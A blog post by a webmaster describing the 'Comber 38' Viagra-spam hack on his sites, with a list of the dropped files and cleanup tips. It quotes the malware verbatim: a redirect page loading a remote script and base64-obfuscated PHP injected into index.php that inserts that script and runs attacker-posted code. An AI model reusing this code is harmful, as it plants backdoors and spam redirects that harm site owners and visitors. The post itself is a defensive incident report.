The “Comber 38” Viagra Hack

Just when I though the Drunkjeans Hack had passed over, there’s another attack on a couple of my sites. I’ll call it the “Comber 38” hack. These hacks are most likely related.

What does this hack do?

With Comber 38, your sites are turned into Viagra Promo sites. Search for “viagra hack” and you’ll see how common this problem is.

Even though your home page may still work, the hackers use your site as a storage for images that can be pulled in from other sites, hence poncing off your server’s bandwidth.

If these files are linked to, your site is redirecting to some viagra site. It gioves the hackers and spammers direct link to a clean site rather than having to use their spam domains directly. If it wouldn’t be so evil, you ould argue it’s a pretty bright idea…

In fact, here’s what’s in one of those files:

<html>
<head>
<script>
location = 'http://cheapviagrarx.com/';
</script>
</head>
</html>
<script src=http://pkd.home.pl/regietow/button_krakow.php >
</script>

Apart from that, I’ve also discovered the following code at the top of my index.php file:

<code>&lt;?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnczRzJykpe2Z1bmN0aW9uIHM0cygkcyl7aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKHByZWdfbWF0Y2goJyNbXC4gXXdpZHRoXHMqPVxzKltcJyJdPzAqWzAtOV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwzQnJaQzVvYjIxbExuQnNMM0psWjJsbGRHOTNMMkoxZEhSdmJsOXJjbUZyYjNjdWNHaHdJRDQ4TDNOamNtbHdkRDQ9JyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcywxKTtlbHNlaWYoc3RycG9zKCRzLCc8YScpKSRzPSRhLiRzO3JldHVybiRzO31mdW5jdGlvbiBzNHMyKCRhLCRiLCRjLCRkKXtnbG9iYWwkczRzMTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkczRzMSkpY2FsbF91c2VyX2Z1bmMoJHM0czEsJGEsJGIsJGMsJGQpO2ZvcmVhY2goQG9iX2dldF9zdGF0dXMoMSlhcyR2KWlmKCgkYT0kdlsnbmFtZSddKT09J3M0cycpcmV0dXJuO2Vsc2VpZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7ZWxzZSRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ3M0cycpO2ZvcigkaT0wOyRpPGNvdW50KCRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0pO2VjaG8gJHNbJGldWzFdO319fSRzNHNsPSgoJGE9QHNldF9lcnJvcl9oYW5kbGVyKCdzNHMyJykpIT0nczRzMicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7')); ?&gt;</code>

I removed it – but after a few hours it was back as this:

&lt;? php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygncHh1eCcpKXtmdW5jdGlvbiBweHV4KCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7aWYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8fCgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwnJywkcyk7fWlmKHByZWdfbWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14+XSo/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYocHJlZ19tYXRjaCgnI1tcLiBdd2lkdGhccyo9XHMqW1wnIl0/MCpbMC05XVtcJyI+IF18ZGlzcGxheVxzKjpccypub25lI2knLCR2KSYmIXN0cnN0cigkdiwnPycuJz4nKSkkcz1wcmVnX3JlcGxhY2UoJyMnLnByZWdfcXVvdGUoJHYsJyMnKS4nLio/PC9pZnJhbWU+I2lzJywnJywkcyk7JHM9c3RyX3JlcGxhY2UoJGE9YmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0J6Y21NOWFIUjBjRG92TDNCclpDNW9iMjFsTG5Cc0wzSmxaMmxsZEc5M0wySjFkSFJ2Ymw5cmNtRnJiM2N1Y0dod0lENDhMM05qY21sd2REND0nKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzLDEpO2Vsc2VpZihzdHJwb3MoJHMsJzxhJykpJHM9JGEuJHM7cmV0dXJuJHM7fWZ1bmN0aW9uIHB4dXgyKCRhLCRiLCRjLCRkKXtnbG9iYWwkcHh1eDE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJHB4dXgxKSljYWxsX3VzZXJfZnVuYygkcHh1eDEsJGEsJGIsJGMsJGQpO2ZvcmVhY2goQG9iX2dldF9zdGF0dXMoMSlhcyR2KWlmKCgkYT0kdlsnbmFtZSddKT09J3B4dXgnKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdweHV4Jyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JHB4dXhsPSgoJGE9QHNldF9lcnJvcl9oYW5kbGVyKCdweHV4MicpKSE9J3B4dXgyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?&gt;

After a while Google will determine infected sites as “not safe” and StopBadware.org will onpass this data to Firefox which in turn will block your site from being viewed.

Your hosting company may close down your site until you remove the thread.

What can we do about this, Cap’n?

At the moment, I assume that deleting the files will clear up the problem. Once that’s done, all we can hope for is that attacks will stay away until we can determine which security exploit (probably in Apache) has to be fixed. This is getting ridiculous!

If your site has been reported as “not safe”, you can help matters by requesting a review here and let StopBadware.org know that your site is no longer used for malicious activities.

Hack Variations

I’ve seen the following variations of these files. Please check your sites carefully if you see any of these or similar files (in which case, please leave a comment):

comber38.html / comber38.jpg
veld27.html/ veld27.jpg
spooky98.html / spooky98.jpg
hobnob59.thml / hobnob59.jpg
whoosh80.html / whoosh80.jpg
flight34.html / flight34.jpg
tiara30.html / tiara30.jpg
vista46.html / vista46.jpg
botch11.html / botch11.jpg
fetid47.html / fedif47.jpg
sullen50.html / sullen50.jpg
plea30.html / plea30.jpg
load38.html (interestingly without a .jpg variant)
craggy37.html / craggy 36.jpg
oxeye36.html
cradle60.html
sacred57.html
jacket78.html
orrery12.html
royal13.html
zigzag74.html
chance41.html

Conclusion

Thesse are troubling times, my friends! Please contribute below if your site has been compromised, and especially if you know how we can all prevent this from happening in the future.

Thanks 🙁





Jay is the CEO and founder of WP Hosting, a boutique style managed WordPress hosting and support service. He has been working with Plesk since version 9 and is a qualified Parallels Automation Professional. In his spare time he likes to develop iOS apps and WordPress plugins, or draw on tablet devices. He blogs about his coding journey at http://wpguru.co.uk and http://pinkstone.co.uk.